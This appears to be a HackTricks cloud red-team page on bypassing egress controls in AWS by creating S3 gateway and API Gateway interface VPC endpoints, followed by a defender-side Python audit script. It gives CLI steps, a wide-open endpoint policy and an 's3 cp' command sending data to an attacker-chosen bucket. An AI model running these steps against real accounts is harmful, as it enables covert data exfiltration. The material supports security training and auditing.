AWS – Bypass Egress from Isolated Subnets via VPC Endpoints


tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Summary

This technique abuses VPC Endpoints to build data exfiltration channels out of subnets that have no Internet Gateway (IGW) or NAT. Gateway endpoints (S3 and DynamoDB only) add a route for the service's managed prefix list to the subnet's route table; Interface endpoints (PrivateLink: execute-api, secretsmanager, ssm, sts, etc.) create ENIs with private IPs inside your subnets, reachable according to the security group attached to them. With a small set of VPC/EC2 permissions (ec2:CreateVpcEndpoint plus, for interface endpoints, the ability to pick or create a security group) an attacker can enable controlled egress to AWS services that never touches the public Internet, so perimeter controls such as egress proxies, NAT-side firewalls and IGW-less "air-gapped" designs do not see it. Unless an endpoint policy restricts it, the endpoint reaches resources in any AWS account, including the attacker's own.

Prerequisites: an existing VPC with private subnets (no IGW/NAT). You need permissions to create VPC endpoints and, for Option B, a security group to attach to the endpoint ENIs. The instance you exfiltrate from still needs AWS credentials (instance profile, stolen keys, etc.) that the target service accepts.

Option A – S3 Gateway VPC Endpoint

Parameters

  • REGION=us-east-1
  • VPC_ID=<target vpc>
  • RTB_IDS=<comma-separated route table IDs of private subnets>
  1. Create an endpoint policy file (optional). The sample below is fully permissive: despite the file name it allows every S3 action on every bucket in any account. If you omit the policy entirely, AWS attaches its default full-access policy, which is equivalent for this purpose. Endpoint policies are resource policies, so the statement carries a Principal element. Save it as allow-put-get-any-s3.json:
```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": "*",
      "Action": ["s3:*"],
      "Resource": ["*"]
    }
  ]
}
```
  2. Create the S3 Gateway endpoint (this adds a route for the S3 managed prefix list to each selected route table):
```bash
aws ec2 create-vpc-endpoint \
  --vpc-id $VPC_ID \
  --service-name com.amazonaws.$REGION.s3 \
  --vpc-endpoint-type Gateway \
  --route-table-ids $RTB_IDS \
  --policy-document file://allow-put-get-any-s3.json   # optional; default policy is full access
```

Evidence to capture:

  • aws ec2 describe-route-tables --route-table-ids $RTB_IDS shows a route to the AWS S3 prefix list (for example DestinationPrefixListId=pl-..., GatewayId=vpce-...).
  • From an instance in those subnets (with IAM permissions for the bucket) you can exfiltrate via S3 without any Internet path. Gateway endpoints only serve buckets in the same Region as the endpoint, so keep --region set to $REGION and use a bucket created there; the bucket can live in any account (for example one you control) unless the endpoint policy or a bucket policy with an aws:SourceVpce condition says otherwise:
```bash
# On the isolated instance (e.g., via SSM Session Manager):
echo data > /tmp/x.txt
aws s3 cp /tmp/x.txt s3://<your-bucket>/egress-test/x.txt --region $REGION
```

Option B – Interface VPC Endpoint for API Gateway (execute-api)

Parameters

  • REGION=us-east-1
  • VPC_ID=<target vpc>
  • SUBNET_IDS=<comma-separated private subnets>
  • SG_VPCE=<security group for the endpoint ENIs allowing 443 from target instances>
  1. Create the interface endpoint and attach the SG. With --private-dns-enabled, *.execute-api.$REGION.amazonaws.com resolves inside the VPC to the endpoint ENIs, so the normal invoke URL works unchanged (side effect: public edge-optimized/regional APIs are no longer reachable from the VPC by their default hostnames):
```bash
aws ec2 create-vpc-endpoint \
  --vpc-id $VPC_ID \
  --service-name com.amazonaws.$REGION.execute-api \
  --vpc-endpoint-type Interface \
  --subnet-ids $SUBNET_IDS \
  --security-group-ids $SG_VPCE \
  --private-dns-enabled
```

Evidence to collect:

  • aws ec2 describe-vpc-endpoints shows the endpoint in state available with NetworkInterfaceIds (ENIs placed in your subnets).
  • Instances in those subnets can reach Private API Gateway endpoints through those VPCE ENIs (no Internet path needed). A private REST API must carry a resource policy that allows the caller, typically keyed on aws:SourceVpce, so an attacker-owned private API with a permissive resource policy is the receiving side of this channel.

Impact

  • Bypasses perimeter egress controls by using AWS-managed private paths to AWS services; nothing traverses an IGW, NAT, proxy or Internet-facing firewall.
  • Enables data exfiltration from isolated subnets (e.g., writing to S3, calling a Private API Gateway, reaching Secrets Manager/SSM/STS, etc.) without IGW/NAT. Only endpoint policies, service resource policies (aws:SourceVpce / aws:SourceVpc conditions) and SCPs that deny ec2:CreateVpcEndpoint stand in the way.
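A defender-side check for both Option A and Option B, as an added example that is not part of the original page or of any AWS tooling. It takes the parsed JSON of `aws ec2 describe-route-tables` and `aws ec2 describe-vpc-endpoints` (the two samples below are constructed, but follow the shape of the real CLI output) and flags three things: a gateway-endpoint prefix-list route on a route table that has no IGW/NAT default route, an endpoint policy that allows any action on any resource with no condition (the AWS default when `--policy-document` is omitted), and an interface endpoint with private DNS enabled. Resource IDs such as `vpce-0s3gw` and the account ID in the condition are made up for the sample.

```python
"""Audit route tables and VPC endpoints for the egress paths described above.

Hypothetical helper (not HackTricks code, not an AWS tool). Feed it the parsed
JSON of `aws ec2 describe-route-tables` and `aws ec2 describe-vpc-endpoints`;
the samples below are constructed but follow the shape of real CLI output.
"""
import json

# Constructed sample: rtb-0aaa is a private table (no 0.0.0.0/0 via igw-/nat-)
# that gained an S3 prefix-list route to a gateway endpoint; rtb-0bbb is public.
ROUTE_TABLES = {"RouteTables": [
    {"RouteTableId": "rtb-0aaa", "VpcId": "vpc-0123", "Routes": [
        {"DestinationCidrBlock": "10.0.0.0/16", "GatewayId": "local", "State": "active"},
        {"DestinationPrefixListId": "pl-63a5400a", "GatewayId": "vpce-0s3gw", "State": "active"}]},
    {"RouteTableId": "rtb-0bbb", "VpcId": "vpc-0123", "Routes": [
        {"DestinationCidrBlock": "10.0.0.0/16", "GatewayId": "local", "State": "active"},
        {"DestinationCidrBlock": "0.0.0.0/0", "GatewayId": "igw-0pub", "State": "active"}]},
]}

# Constructed sample: the S3 gateway endpoint (Option A, permissive policy) and
# the execute-api interface endpoint (Option B). As in real output, PolicyDocument
# is a JSON string, not a nested object.
VPC_ENDPOINTS = {"VpcEndpoints": [
    {"VpcEndpointId": "vpce-0s3gw", "VpcEndpointType": "Gateway",
     "ServiceName": "com.amazonaws.us-east-1.s3", "State": "available",
     "RouteTableIds": ["rtb-0aaa"],
     "PolicyDocument": json.dumps({"Version": "2012-10-17", "Statement": [
         {"Effect": "Allow", "Principal": "*", "Action": ["s3:*"], "Resource": ["*"]}]})},
    {"VpcEndpointId": "vpce-0apigw", "VpcEndpointType": "Interface",
     "ServiceName": "com.amazonaws.us-east-1.execute-api", "State": "available",
     "SubnetIds": ["subnet-0priv"], "PrivateDnsEnabled": True,
     "PolicyDocument": json.dumps({"Version": "2012-10-17", "Statement": [
         {"Effect": "Allow", "Principal": "*", "Action": "*", "Resource": "*",
          "Condition": {"StringEquals": {"aws:PrincipalAccount": "111122223333"}}}]})},
]}


def _as_list(x):
    """IAM JSON allows scalars or lists for Statement/Action/Resource."""
    return x if isinstance(x, list) else [x]


def private_route_tables(route_tables):
    """IDs of route tables with no default route through an IGW or NAT gateway."""
    private = set()
    for rt in route_tables["RouteTables"]:
        has_egress = any(
            r.get("DestinationCidrBlock") == "0.0.0.0/0"
            and (r.get("GatewayId", "").startswith("igw-")
                 or r.get("NatGatewayId", "").startswith("nat-"))
            for r in rt["Routes"])
        if not has_egress:
            private.add(rt["RouteTableId"])
    return private


def gateway_routes_on_private_tables(route_tables):
    """(route table, prefix list, vpce) for gateway-endpoint routes on private tables."""
    private = private_route_tables(route_tables)
    hits = []
    for rt in route_tables["RouteTables"]:
        if rt["RouteTableId"] not in private:
            continue
        for r in rt["Routes"]:
            if "DestinationPrefixListId" in r and r.get("GatewayId", "").startswith("vpce-"):
                hits.append((rt["RouteTableId"], r["DestinationPrefixListId"], r["GatewayId"]))
    return hits


def policy_is_wide_open(policy_document):
    """True if an unconditioned Allow grants '*' or '<svc>:*' on Resource '*'.

    The AWS default endpoint policy (attached when --policy-document is omitted)
    is exactly such a statement, so it is flagged too.
    """
    doc = json.loads(policy_document) if isinstance(policy_document, str) else policy_document
    for st in _as_list(doc.get("Statement", [])):
        if st.get("Effect") != "Allow" or st.get("Condition"):
            continue
        actions = _as_list(st.get("Action", []))
        resources = _as_list(st.get("Resource", []))
        if any(a == "*" or a.endswith(":*") for a in actions) and "*" in resources:
            return True
    return False


def audit(route_tables, endpoints):
    """Return human-readable findings; an empty list means nothing was flagged."""
    findings = []
    for rtb, pl, vpce in gateway_routes_on_private_tables(route_tables):
        findings.append(f"{rtb}: prefix list {pl} routed to {vpce} (gateway endpoint reachable from a private subnet)")
    for ep in endpoints["VpcEndpoints"]:
        eid, svc = ep["VpcEndpointId"], ep["ServiceName"]
        if policy_is_wide_open(ep.get("PolicyDocument", "{}")):
            findings.append(f"{eid} ({svc}): endpoint policy allows any action on any resource with no condition")
        if ep["VpcEndpointType"] == "Interface" and ep.get("PrivateDnsEnabled"):
            findings.append(f"{eid} ({svc}): interface endpoint with private DNS in {', '.join(ep.get('SubnetIds', []))}")
    return findings


if __name__ == "__main__":
    for finding in audit(ROUTE_TABLES, VPC_ENDPOINTS):
        print("FINDING:", finding)
```

Against the samples this reports the S3 route on rtb-0aaa, the unconditioned s3:* policy on the gateway endpoint, and the private-DNS interface endpoint; the execute-api policy is not flagged because its Allow is scoped by an aws:PrincipalAccount condition, which is the shape of the fix (restrict endpoint policies to your own accounts and buckets rather than leaving the default).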
